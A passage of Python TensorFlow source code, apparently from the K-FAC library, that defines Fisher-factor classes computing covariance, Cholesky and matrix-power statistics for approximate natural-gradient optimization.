A tensor of shape `[num_ind, ...]`.
"""
with tf.name_scope(name, "random_gather", [array]):
array = tf.convert_to_tensor(array)
total_size = array.shape.as_list()[0]
if total_size is None:
total_size = utils.get_shape(array)[0]
indices = tf.random_shuffle(tf.range(0, total_size))[:num_ind]
return tf.gather(array, indices, axis=0)
@six.add_metaclass(abc.ABCMeta)
class FisherFactor(object):
"""Base class for objects modeling factors of approximate Fisher blocks.
A FisherFactor represents part of an approximate Fisher Information matrix.
For example, one approximation to the Fisher uses the Kronecker product of two
FisherFactors A and B, F = kron(A, B). FisherFactors are composed with
FisherBlocks to construct a block-diagonal approximation to the full Fisher.
FisherFactors are backed by a single, non-trainable variable that is updated
by running FisherFactor.make_covariance_update_op(). The shape and type of
this variable is implementation specific.
Note that for blocks that aren't based on approximations, a 'factor' can
be the entire block itself, as is the case for the diagonal and full
representations.
"""
def __init__(self):
self._cov_tensor = None
self._cov = None
self._acc_cov = None
@abc.abstractproperty
def _var_scope(self):
"""Variable scope for this FisherFactor instance.
Returns:
string that unique identifies this FisherFactor instance.
"""
pass
@property
def name(self):
return self._var_scope
@abc.abstractproperty
def _cov_shape(self):
"""The shape of the variable backing this FisherFactor."""
pass
@abc.abstractproperty
def _num_sources(self):
"""The number of things to sum over when updating covariance variable.
The default make_covariance_update_op function will call _compute_new_cov
with indices ranging from 0 to _num_sources-1. The typical situation is
where the factor wants to sum the statistics it computes over multiple
backpropped "gradients" (typically passed in via "tensors" or
"outputs_grads" arguments).
"""
pass
@abc.abstractproperty
def _num_towers(self):
pass
@abc.abstractproperty
def _dtype(self):
"""dtype for variable backing this factor."""
pass
@abc.abstractmethod
def _partial_batch_size(self, source=0, tower=0):
"""Returns (partial) batch size associated with given source and tower."""
pass
def batch_size(self, source=0):
"""Returns (total) batch size associated with given source."""
return sum(self._partial_batch_size(source=source, tower=tower)
for tower in range(self._num_towers))
def check_partial_batch_sizes(self):
"""Ensures partial batch sizes are equal across towers and source."""
# While it could be okay in principle for the different batch sizes for
# different towers, the way the code has been written isn't compatible with
# this. Basically, the normalizations occur for each tower and then the
# results are summed across towers and divided by the number of towers.
# The only way this is correct is if the towers all have the same batch
# size.
# Should make these messages use quote characters instead of parentheses
# when the bug with quote character rendering in assertion messages is
# fixed. See b/129476712
msg = ("Inconsistent (partial) batch sizes detected for factor ({}) of type"
" {}. This can be caused by passing Tensors with the wrong sizes to "
"the registration functions, or misspecification of arguments like "
"batch_size, num_uses, or num_timesteps.".format(
self.name, utils.cls_name(self)))
partial_batch_size = self._partial_batch_size()
if self._num_sources > 1 or self._num_towers > 1:
if isinstance(partial_batch_size, int):
checks = tuple(
partial_batch_size == self._partial_batch_size(source=source,
tower=tower)
for source, tower in zip(range(self._num_sources),
range(self._num_towers)))
if not all(checks):
raise ValueError(msg)
return tf.no_op()
else:
asserts = tuple(
tf.assert_equal(partial_batch_size,
self._partial_batch_size(source=source,
tower=tower),
message=msg)
for source, tower in zip(range(self._num_sources),
range(self._num_towers)))
return tf.group(asserts)
return tf.no_op()
@property
def _cov_initializer(self):
"""Function for initializing covariance variable."""
return covariance_initializer
def instantiate_cov_variables(self):
"""Makes the internal cov variable(s)."""
assert self._cov is None
with tf.variable_scope(self._var_scope):
self._cov = utils.MovingAverageVariable(
name="cov",
shape=self._cov_shape,
dtype=self._dtype,
initializer=self._cov_initializer,
normalize_value=ZERO_DEBIAS)
self._acc_cov = utils.AccumulatorVariable(
name="acc_cov",
shape=self._cov_shape,
dtype=self._dtype)
@abc.abstractmethod
def _compute_new_cov(self, source, tower):
"""Computes minibatch-estimated covariance for a single source.
Args:
source: int in [0, self._num_sources). Which source to use when computing
the cov update.
tower: int in [0, self._num_towers). Which tower to use when computing
the cov update.
Returns:
Tensor of same shape as self.cov.
"""
pass
def _compute_total_new_cov(self):
"""Computes covariance by summing across (source, towers)."""
new_cov_contribs = []
for source in range(self._num_sources):
for tower in range(self._num_towers):
with maybe_place_on_device(self._get_data_device(tower)):
new_cov_contribs.append(self._compute_new_cov(source, tower))
new_cov = tf.add_n(new_cov_contribs) / float(self._num_towers)
# Compute average of 'new_cov' across all replicas. On a replica, each
# instance of 'new_cov' will be based on a different minibatch. This ensures
# that by the end of assign_moving_average(), all replicas see the same
# value for self._cov.
#
# Other implementations of make_covariance_update_op() that accumulate
# statistics in other variables should mimic this behavior.
#
# NOTE: communicating this matrix at every iteration is wasteful in the
# sense that we might only need fresh copies when we do the inversions.
# (Although be careful about factors [e.g. diagonal] or ops
# [e.g. multiply()] that directly use the cov vars instead of the inv vars!)
new_cov = utils.all_average(new_cov)
return new_cov
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
"""Constructs and returns the covariance update Op.
Args:
ema_decay: float or Tensor. The exponential moving average decay.
ema_weight: float or Tensor. The weight to put on the newly computed values.
This is typically 1.0 - ema_decay.
should_write: Python or TF bool. If True, we write the covariance to
the variable and reset the accumulator instead of just accumulating.
(Default: True)
Returns:
The op which updates the cov variable (via acc_cov).
"""
cov_tensor = self._compute_total_new_cov()
self._cov_tensor = cov_tensor # This is used for non-standard applications
# and debugging I think.
return accumulate_and_maybe_write(self._acc_cov,
self._cov,
cov_tensor,
ema_decay,
ema_weight,
should_write)
@abc.abstractmethod
def _get_data_device(self, tower):
pass
@abc.abstractmethod
def instantiate_inv_variables(self):
"""Makes the internal "inverse" variable(s)."""
pass
@abc.abstractmethod
def make_inverse_update_ops(self):
"""Create and return update ops corresponding to registered computations."""
pass
@property
def cov(self):
return self._cov.value
def get_cov_vars(self):
return [self.cov]
def get_inv_vars(self):
return []
@abc.abstractmethod
def get_cov_as_linear_operator(self):
"""Returns `LinearOperator` instance which wraps the cov matrix."""
pass
@abc.abstractmethod
def register_matpower(self, exp, damping_func):
pass
@abc.abstractmethod
def register_cholesky(self, damping_func):
pass
@abc.abstractmethod
def register_cholesky_inverse(self, damping_func):
pass
@abc.abstractmethod
def get_matpower(self, exp, damping_func):
pass
@abc.abstractmethod
def get_cholesky(self, damping_func):
pass
@abc.abstractmethod
def get_cholesky_inverse(self, damping_func):
pass
class DenseSquareMatrixFactor(FisherFactor):
"""Base class for FisherFactors that are stored as dense square matrices.
This class explicitly calculates and stores inverses of their `cov` matrices,
which must be square dense matrices.
Subclasses must implement the _compute_new_cov method, and the _var_scope and
_cov_shape properties.
"""
# TODO(b/69108481): This class (and its subclasses) should be refactored to
# serve the matrix quantities it computes as both (potentially stale)
# variables, updated by the inverse update ops, and fresh values stored in
# tensors that recomputed once every session.run() call. Currently matpower
# and damp_inverse have the former behavior, while eigendecomposition has
# the latter.
def __init__(self):
self._matpower_by_exp_and_damping = OrderedDict() # { (float, hashable): variable }
self._matpower_registrations = set() # { (float, hashable) }
self._eigendecomp = None
self._damping_funcs_by_id = OrderedDict() # {hashable: lambda}
self._cholesky_registrations = set() # { hashable }
self._cholesky_inverse_registrations = set() # { hashable }
self._cholesky_by_damping = OrderedDict() # { hashable: variable }
self._cholesky_inverse_by_damping = OrderedDict() # { hashable: variable }
super(DenseSquareMatrixFactor, self).__init__()
def get_cov_as_linear_operator(self):
"""Returns `LinearOperator` instance which wraps the cov matrix."""
assert self.cov.shape.ndims == 2
return lo.LinearOperatorFullMatrix(self.cov,
is_self_adjoint=True,
is_square=True)
def _register_damping(self, damping_func):
damping_id = graph_func_to_id(damping_func)
if damping_id not in self._damping_funcs_by_id:
self._damping_funcs_by_id[damping_id] = damping_func
return damping_id
def register_inverse(self, damping_func):
# Just for backwards compatibility of some old code and tests
self.register_matpower(-1, damping_func)
def register_matpower(self, exp, damping_func):
"""Registers a matrix power to be maintained and served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_matpower.
Args:
exp: float. The exponent to use in the matrix power.
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
if exp == 1.0:
return
damping_id = self._register_damping(damping_func)
if (exp, damping_id) not in self._matpower_registrations:
self._matpower_registrations.add((exp, damping_id))
def register_cholesky(self, damping_func):
"""Registers a Cholesky factor to be maintained and served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_cholesky.
Args:
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
damping_id = self._register_damping(damping_func)
if damping_id not in self._cholesky_registrations:
self._cholesky_registrations.add(damping_id)
def register_cholesky_inverse(self, damping_func):
"""Registers an inverse Cholesky factor to be maintained/served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_cholesky_inverse.
Args:
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
damping_id = self._register_damping(damping_func)
if damping_id not in self._cholesky_inverse_registrations:
self._cholesky_inverse_registrations.add(damping_id)
def get_inv_vars(self):
inv_vars = []
inv_vars.extend(self._matpower_by_exp_and_damping.values())
inv_vars.extend(self._cholesky_by_damping.values())
inv_vars.extend(self._cholesky_inverse_by_damping.values())
return inv_vars
def instantiate_inv_variables(self):
"""Makes the internal "inverse" variable(s)."""
for (exp, damping_id) in self._matpower_registrations:
exp_string = scalar_or_tensor_to_string(exp)
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
matpower = tf.get_variable(
"matpower_exp{}_damp{}".format(exp_string, damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert (exp, damping_id) not in self._matpower_by_exp_and_damping
self._matpower_by_exp_and_damping[(exp, damping_id)] = matpower
for damping_id in self._cholesky_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
chol = tf.get_variable(
"cholesky_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._cholesky_by_damping
self._cholesky_by_damping[damping_id] = chol
for damping_id in self._cholesky_inverse_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
cholinv = tf.get_variable(
"cholesky_inverse_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._cholesky_inverse_by_damping
self._cholesky_inverse_by_damping[damping_id] = cholinv
def make_inverse_update_ops(self):
"""Create and return update ops corresponding to registered computations."""
ops = []
num_inverses = sum(1 for (exp, _) in self._matpower_by_exp_and_damping
if exp == -1)
num_other_matpower = len(self._matpower_by_exp_and_damping) - num_inverses
other_matrix_power_registered = num_other_matpower >= 1
use_eig = (
self._eigendecomp or other_matrix_power_registered or
num_inverses >= EIGENVALUE_DECOMPOSITION_THRESHOLD)
# We precompute these so we don't need to evaluate them multiple times (for
# each matrix power that uses them)
damping_value_by_id = {damping_id: tf.cast(
self._damping_funcs_by_id[damping_id](), self._dtype)
for damping_id in self._damping_funcs_by_id}
if use_eig:
eigenvalues, eigenvectors = self.get_eigendecomp() # pylint: disable=unpacking-non-sequence
for (exp, damping_id), matpower in (
self._matpower_by_exp_and_damping.items()):
damping = damping_value_by_id[damping_id]
ops.append(
utils.smart_assign(
matpower,
tf.matmul(eigenvectors * (eigenvalues + damping)**exp,
tf.transpose(eigenvectors))))
# These ops share computation and should be run on a single device.
ops = [tf.group(*ops)]
else:
for (exp, damping_id), matpower in (
self._matpower_by_exp_and_damping.items()):
assert exp == -1
damping = damping_value_by_id[damping_id]
ops.append(
utils.smart_assign(matpower, utils.posdef_inv(self.cov, damping)))
# TODO(b/77902055): If inverses are being computed with Cholesky's
# we can share the work. Instead this code currently just computes the
# Cholesky a second time. It does at least share work between requests for
# Cholesky's and Cholesky inverses with the same damping id.
for damping_id, cholesky_inv in self._cholesky_inverse_by_damping.items():
cholesky_ops = []
damping = damping_value_by_id[damping_id]
cholesky_value = utils.cholesky(self.cov, damping)
if damping_id in self._cholesky_by_damping:
cholesky = self._cholesky_by_damping[damping_id]
cholesky_ops.append(utils.smart_assign(cholesky, cholesky_value))
identity = tf.eye(
cholesky_value.shape.as_list()[0], dtype=cholesky_value.dtype)
cholesky_inv_value = tf.matrix_triangular_solve(cholesky_value, identity)
cholesky_ops.append(utils.smart_assign(cholesky_inv, cholesky_inv_value))
ops.append(tf.group(*cholesky_ops))
for damping_id, cholesky in self._cholesky_by_damping.items():
if damping_id not in self._cholesky_inverse_by_damping:
damping = damping_value_by_id[damping_id]
cholesky_value = utils.cholesky(self.cov, damping)
ops.append(utils.smart_assign(cholesky, cholesky_value))
self._eigendecomp = False
return ops
def get_inverse(self, damping_func):
# Just for backwards compatibility of some old code and tests
return self.get_matpower(-1, damping_func)
def get_matpower(self, exp, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov (except when exp == 1).
if exp != 1:
damping_id = graph_func_to_id(damping_func)
matpower = self._matpower_by_exp_and_damping[(exp, damping_id)]
else:
cov = self.cov
identity = tf.eye(cov.shape.as_list()[0], dtype=cov.dtype)
matpower = cov + tf.cast(damping_func(), dtype=self.cov.dtype)*identity
assert matpower.shape.ndims == 2
return lo.LinearOperatorFullMatrix(matpower,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
def get_cholesky(self, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov.
damping_id = graph_func_to_id(damping_func)
cholesky = self._cholesky_by_damping[damping_id]
assert cholesky.shape.ndims == 2
return lo.LinearOperatorFullMatrix(cholesky,
is_non_singular=True,
is_square=True)
def get_cholesky_inverse(self, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov.
damping_id = graph_func_to_id(damping_func)
cholesky_inv = self._cholesky_inverse_by_damping[damping_id]
assert cholesky_inv.shape.ndims == 2
return lo.LinearOperatorFullMatrix(cholesky_inv,
is_non_singular=True,
is_square=True)
def get_eigendecomp(self):
"""Creates or retrieves eigendecomposition of self._cov."""
# Unlike get_matpower this doesn't retrieve a stored variable, but instead
# always computes a fresh version from the current value of self.cov.
if not self._eigendecomp:
eigenvalues, eigenvectors = tf.self_adjoint_eig(self.cov)
# The matrix self._cov is positive semidefinite by construction, but the
# numerical eigenvalues could be negative due to numerical errors, so here
# we clip them to be at least FLAGS.eigenvalue_clipping_threshold
clipped_eigenvalues = tf.maximum(eigenvalues,
EIGENVALUE_CLIPPING_THRESHOLD)
self._eigendecomp = (clipped_eigenvalues, eigenvectors)
return self._eigendecomp
class NaiveFullFactor(DenseSquareMatrixFactor):
"""FisherFactor for a full matrix representation of the Fisher of a parameter.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self,
params_grads,
batch_size):
self._batch_size = batch_size
self._params_grads = tuple(utils.ensure_sequence(params_grad)
for params_grad in params_grads)
super(NaiveFullFactor, self).__init__()
@property
def _var_scope(self):
return "ff_naivefull_" + scope_string_from_params(
[self._params_grads, self._batch_size])
@property
def _cov_shape(self):
size = sum(param_grad.shape.num_elements()
for param_grad in self._params_grads[0])
return (size, size)
@property
def _num_sources(self):
return len(self._params_grads)
@property
def _num_towers(self):
return 1
@property
def _dtype(self):
return self._params_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
assert source == 0 and tower == 0
return self._batch_size
def _compute_new_cov(self, source, tower):
assert tower == 0
# This will be a very basic rank 1 estimate
params_grads_flat = utils.tensors_to_column(self._params_grads[source])
return ((params_grads_flat * tf.transpose(params_grads_flat)) / tf.cast(
self._batch_size, params_grads_flat.dtype))
def _get_data_device(self, tower):
return None
@six.add_metaclass(abc.ABCMeta)
class DiagonalFactor(FisherFactor):
"""A base class for FisherFactors that use diagonal approximations.
A DiagonalFactor's covariance variable can be of any shape, but must contain
exactly one entry per parameter.
"""
def get_cov_as_linear_operator(self):
"""Returns `LinearOperator` instance which wraps the cov matrix."""
return lo.LinearOperatorDiag(self._matrix_diagonal,
is_self_adjoint=True,
is_square=True)
@property
def _cov_initializer(self):
return diagonal_covariance_initializer
@property
def _matrix_diagonal(self):
return tf.reshape(self.cov, [-1])
def make_inverse_update_ops(self):
return []
def instantiate_inv_variables(self):
pass
def register_matpower(self, exp, damping_func):
pass
def register_cholesky(self, damping_func):
pass
def register_cholesky_inverse(self, damping_func):
pass
def get_matpower(self, exp, damping_func):
matpower_diagonal = (self._matrix_diagonal
+ tf.cast(damping_func(), self._dtype))**exp
return lo.LinearOperatorDiag(matpower_diagonal,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
def get_cholesky(self, damping_func):
return self.get_matpower(0.5, damping_func)
def get_cholesky_inverse(self, damping_func):
return self.get_matpower(-0.5, damping_func)
class NaiveDiagonalFactor(DiagonalFactor):
"""FisherFactor for a diagonal approximation of any type of param's Fisher.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self,
params_grads,
batch_size):
"""Initializes NaiveDiagonalFactor instance.
Args:
params_grads: Sequence of Tensors, each with same shape as parameters this
FisherFactor corresponds to. For example, the gradient of the loss with
respect to parameters.
batch_size: int or 0-D Tensor. Size
"""
self._params_grads = tuple(utils.ensure_sequence(params_grad)
for params_grad in params_grads)
self._batch_size = batch_size
super(NaiveDiagonalFactor, self).__init__()
@property
def _var_scope(self):
return "ff_naivediag_" + scope_string_from_params(
[self._params_grads, self._batch_size])
@property
def _cov_shape(self):
size = sum(param_grad.shape.num_elements()
for param_grad in self._params_grads[0])
return [size, 1]
@property
def _num_sources(self):
return len(self._params_grads)
@property
def _num_towers(self):
return 1
@property
def _dtype(self):
return self._params_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
assert source == 0 and tower == 0
return self._batch_size
def _compute_new_cov(self, source, tower):
assert tower == 0
params_grads_flat = utils.tensors_to_column(self._params_grads[source])
return (tf.square(params_grads_flat) / tf.cast(
self._batch_size, params_grads_flat.dtype))
def _get_data_device(self, tower):
return None
class DiagonalKroneckerFactor(DiagonalFactor):
"""A Kronecker FisherFactor using diagonal approximations.
This class handles both sparse and dense inputs. The covariance is estimated
using the diagonal covariance matrix. For a dense tensor:
Cov(inputs, inputs) = (1/batch_size) sum_{i} diag(inputs[i,:] ** 2).
For sparse inputs, one of the most common use cases is the sparse input to an
embedding layer. Given tensor = [batch_size, input_size] representing
indices into an [vocab_size, embedding_size] embedding matrix, the diagonal
covariance matrix is
Cov(inputs, inputs) =
(1/batch_size) sum_{i} diag(n_hot(inputs[i]) ** 2).
where inputs[i] is the ith list of input ids, n_hot() constructs an n-hot
binary vector and diag() constructs a diagonal matrix of size
[vocab_size, vocab_size].
"""
def __init__(self, tensors, has_bias=False, dtype=None):
"""Instantiate DiagonalKroneckerFactor.
Args:
tensors: List of list of Tensors, each of shape [batch_size, n]. First
index is source, second index is tower. Two types of tensors are
supported. Dense tensors are typically either a layer's inputs or its
output's gradients. Sparse tensors are typically indices into an
[vocab_size, embedding_dim] embedding matrix. Sparse tensors must have
a property named "one_hot_depth" indicating the depth of one-hot tensors
they should be converted to.
dtype: dtype for covariance statistics. Only used for sparse inputs. Must
be a floating point type. Defaults to float32.
has_bias: bool. If True, append '1' to each input.
"""
self._tensors = tensors
dtype = dtype or tf.float32
self._has_bias = has_bias
self._one_hot_depth = getattr(self._tensors[0][0], "one_hot_depth", None)
if self._one_hot_depth is None:
self._dense_input = True
self._cov_dtype = self._tensors[0][0].dtype
else:
self._dense_input = False
self._cov_dtype = dtype
super(DiagonalKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_diag_kron_" + scope_string_from_params(
nest.flatten(self._tensors))
@property
def _cov_shape(self):
if self._dense_input:
size = self._tensors[0][0].shape[1] + self._has_bias
else:
size = self._one_hot_depth + self._has_bias
return [size]
@property
def _num_sources(self):
return len(self._tensors)
@property
def _num_towers(self):
return len(self._tensors[0])
@property
def _dtype(self):
return self._cov_dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._tensors[source][tower])[0]
def _compute_new_cov(self, source, tower):
tensor = self._tensors[source][tower]
if len(tensor.shape) > 2:
raise ValueError(
"Input tensors to DiagonalKroneckerFactor must have rank <= 2. "
"Found tensor with wrong rank: {}".format(tensor))
batch_size = utils.get_shape(tensor)[0]
if self._dense_input:
new_cov = tf.square(tensor)
else:
# Transform indices into one-hot vectors.
#
# TODO(b/72714822): There must be a faster way to construct the diagonal
# covariance matrix! This operation is O(batch_size * vocab_size), where
# it should be O(batch_size * input_size).
flat_input_ids = tf.reshape(tensor, [-1])
new_cov = tf.one_hot(flat_input_ids,
self._one_hot_depth) # [?, vocab_size]
# Take average across examples. Note that, because all entries have
# magnitude zero or one, there's no need to square the entries.
#
# TODO(b/72714822): Support for SparseTensor, other kinds of aggregation
# within an example such as average.
#
# TODO(b/72714822): Support for partitioned embeddings.
new_cov = tf.reduce_sum(new_cov, axis=0)
new_cov /= tf.cast(batch_size, new_cov.dtype)
if self._has_bias:
new_cov = append_homog(new_cov)
return new_cov
def _get_data_device(self, tower):
return self._tensors[0][tower].device
class DiagonalMultiKF(DiagonalKroneckerFactor):
def __init__(self, tensors, num_uses, has_bias=False, dtype=None):
super(DiagonalMultiKF, self).__init__(
tensors, dtype=dtype, has_bias=has_bias)
self._num_uses = num_uses
def _partial_batch_size(self, source=0, tower=0):
# Note that some internal comptutations of "batch_size" done in the parent
# class won't actually be the proper batch size. Instead, they will be
# just "the thing to normalize the statistics by", essentially. This is okay
# as we don't mix the two things up.
return (super(DiagonalMultiKF, self)._partial_batch_size(source=source,
tower=tower)
// self._num_uses)
class FullyConnectedDiagonalFactor(DiagonalFactor):
r"""FisherFactor for a diagonal approx of a fully-connected layer's Fisher.
Given in = [batch_size, input_size] and out_grad = [batch_size, output_size],
approximates the covariance as,
Cov(in, out) = (1/batch_size) sum_{i} outer(in[i], out_grad[i]) ** 2.0
where the square is taken element-wise.
"""
def __init__(self,
inputs,
outputs_grads,
has_bias=False):
"""Instantiate FullyConnectedDiagonalFactor.
Args:
inputs: List of Tensors of shape [batch_size, input_size]. Inputs to this
layer. List index is towers.
outputs_grads: List of Tensors, each of shape [batch_size, output_size],
which are the gradients of the loss with respect to the layer's
outputs. First index is source, second is tower.
has_bias: bool. If True, append '1' to each input.
"""
self._inputs = inputs
self._has_bias = has_bias
self._outputs_grads = outputs_grads
self._squared_inputs = None
super(FullyConnectedDiagonalFactor, self).__init__()
@property
def _var_scope(self):
return "ff_diagfc_" + scope_string_from_params(
tuple(self._inputs) + tuple(nest.flatten(self._outputs_grads)))
@property
def _cov_shape(self):
input_size = self._inputs[0].shape[1] + self._has_bias
output_size = self._outputs_grads[0][0].shape[1]
return [input_size, output_size]
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._outputs_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
self._squared_inputs = []
for tower in range(self._num_towers):
inputs = self._inputs[tower]
with maybe_place_on_device(self._get_data_device(tower)):
if self._has_bias:
inputs = append_homog(inputs)
self._squared_inputs.append(tf.square(inputs))
return super(FullyConnectedDiagonalFactor, self).make_covariance_update_op(
ema_decay, ema_weight, should_write=should_write)
def _compute_new_cov(self, source, tower):
batch_size = utils.get_shape(self._squared_inputs[tower])[0]
outputs_grad = self._outputs_grads[source][tower]
# The well-known special formula that uses the fact that the entry-wise
# square of an outer product is the outer-product of the entry-wise squares.
# The gradient is the outer product of the input and the output gradients,
# so we just square both and then take their outer-product.
new_cov = tf.matmul(
self._squared_inputs[tower], tf.square(outputs_grad), transpose_a=True)
new_cov /= tf.cast(batch_size, new_cov.dtype)
return new_cov
def _get_data_device(self, tower):
return self._inputs[tower].device
@six.add_metaclass(abc.ABCMeta)
class ScaleAndShiftFactor(FisherFactor):
def __init__(self,
inputs,
outputs_grads,
broadcast_dim,
has_shift=True,
approx="full"):
assert approx == "full" or approx == "diagonal"
self._inputs = inputs
self._outputs_grads = outputs_grads
self._broadcast_dim = broadcast_dim
self._has_shift = has_shift
self._approx = approx
super(ScaleAndShiftFactor, self).__init__()
@property
def _var_scope(self):
return "ff_scaleshift_" + scope_string_from_params(
[self._inputs, self._outputs_grads, self._broadcast_dim,
self._has_shift, self._approx])
@property
def _cov_shape(self):
size = np.prod(self._inputs[0].shape[self._broadcast_dim:])
if self._has_shift:
size *= 2
if self._approx == "full":
return (size, size)
elif self._approx == "diagonal":
return (size,)
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def _compute_new_cov(self, source, tower):
# Here we implement a "sum of squares" estimator that uses the special
# structure of the scale & shift operation. In particular, we sum across
# all dimensions that broadcast, then square (or take outer-products), and
# then average across the mini-batch.
inputs = self._inputs[tower]
outputs_grad = self._outputs_grads[source][tower]
batch_size = utils.get_shape(inputs)[0]
assert len(inputs.shape) == len(outputs_grad.shape)
for i in range(1, len(inputs.shape)):
assert inputs.shape[i] <= outputs_grad.shape[i]
# The formula for the gradient of the shift param is just the element-wise
# product of the inputs and the output gradients, summed across the
# dimensions that get broadcasted.
scale_grads = tf.reduce_sum(inputs * outputs_grad,
axis=list(range(1, self._broadcast_dim)))
scale_grads_flat = tf.reshape(scale_grads, [batch_size, -1])
if self._has_shift:
# The formula for the gradient of the shift param is just the output
# gradients, summed across the dimensions that get broadcasted.
shift_grads = tf.reduce_sum(outputs_grad,
axis=list(range(1, self._broadcast_dim)))
shift_grads_flat = tf.reshape(shift_grads, [batch_size, -1])
params_grads_flat = tf.concat([scale_grads_flat, shift_grads_flat],
axis=1)
else:
params_grads_flat = scale_grads_flat
if self._approx == "full":
new_cov = compute_cov(params_grads_flat)
elif self._approx == "diagonal":
new_cov = tf.reduce_mean(tf.square(params_grads_flat), axis=0)
return new_cov
def _get_data_device(self, tower):
return self._inputs[tower].device
class ScaleAndShiftFullFactor(ScaleAndShiftFactor, DenseSquareMatrixFactor):
def __init__(self,
inputs,
outputs_grads,
broadcast_dim,
has_shift=True):
super(ScaleAndShiftFullFactor, self).__init__(inputs,
outputs_grads,
broadcast_dim,
has_shift=has_shift,
approx="full")
class ScaleAndShiftDiagonalFactor(ScaleAndShiftFactor, DiagonalFactor):
def __init__(self,
inputs,
outputs_grads,
broadcast_dim,
has_shift=True):
super(ScaleAndShiftDiagonalFactor, self).__init__(inputs,
outputs_grads,
broadcast_dim,
has_shift=has_shift,
approx="diagonal")
class ConvDiagonalFactor(DiagonalFactor):
"""FisherFactor for a diagonal approx of a convolutional layer's Fisher."""
def __init__(self,
inputs,
outputs_grads,
filter_shape,
strides,
padding,
data_format=None,
dilations=None,
has_bias=False,
patch_mask=None):
"""Creates a ConvDiagonalFactor object.
Args:
inputs: List of Tensors of shape [batch_size, height, width, in_channels].
Input activations to this layer. List index is towers.
outputs_grads: List of Tensors, each of shape [batch_size,
height, width, out_channels], which are the gradients of the loss
with respect to the layer's outputs. First index is source, second
index is tower.
filter_shape: Tuple of 4 ints: (kernel_height, kernel_width, in_channels,
out_channels). Represents shape of kernel used in this layer.
strides: The stride size in this layer (1-D Tensor of length 4).
padding: The padding in this layer (1-D of Tensor length 4).
data_format: None or str. Format of conv2d inputs.
dilations: None or tuple of 4 ints.
has_bias: Python bool. If True, the layer is assumed to have a bias
parameter in addition to its filter parameter.
patch_mask: Tensor of shape [kernel_height, kernel_width, in_channels]
or None. If not None this is multiplied against the extracted patches
Tensor (broadcasting along the batch dimension) before statistics are
computed. (Default: None)
Raises:
ValueError: If inputs, output_grads, and filter_shape do not agree on
in_channels or out_channels.
ValueError: If strides, dilations are not length-4 lists of ints.
ValueError: If data_format does not put channel last.
"""
if not utils.is_data_format_channel_last(data_format):
raise ValueError("Channel must be last.")
if any(input_.shape.ndims != 4 for input_ in inputs):
raise ValueError("inputs must be a list of 4-D Tensors.")
if any(input_.shape.as_list()[-1] != filter_shape[-2] for input_ in inputs):
raise ValueError("inputs and filter_shape must agree on in_channels.")
for i, outputs_grad in enumerate(outputs_grads):
if any(output_grad.shape.ndims != 4 for output_grad in outputs_grad):
raise ValueError("outputs[%d] must be 4-D Tensor." % i)
if any(output_grad.shape.as_list()[-1] != filter_shape[-1]
for output_grad in outputs_grad):
raise ValueError(
"outputs[%d] and filter_shape must agree on out_channels." % i)
if len(strides) != 4:
raise ValueError("strides must be length-4 list of ints.")
if dilations is not None and len(dilations) != 4:
raise ValueError("dilations must be length-4 list of ints.")
self._inputs = inputs
self._outputs_grads = outputs_grads
self._filter_shape = filter_shape
self._strides = strides
self._padding = padding
self._data_format = data_format
self._dilations = dilations
self._has_bias = has_bias
self._patches = None
self._patch_mask = patch_mask
super(ConvDiagonalFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convdiag_" + scope_string_from_params(
tuple(self._inputs) + tuple(nest.flatten(self._outputs_grads)))
@property
def _cov_shape(self):
filter_height, filter_width, in_channels, out_channels = self._filter_shape
return [
filter_height * filter_width * in_channels + self._has_bias,
out_channels
]
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
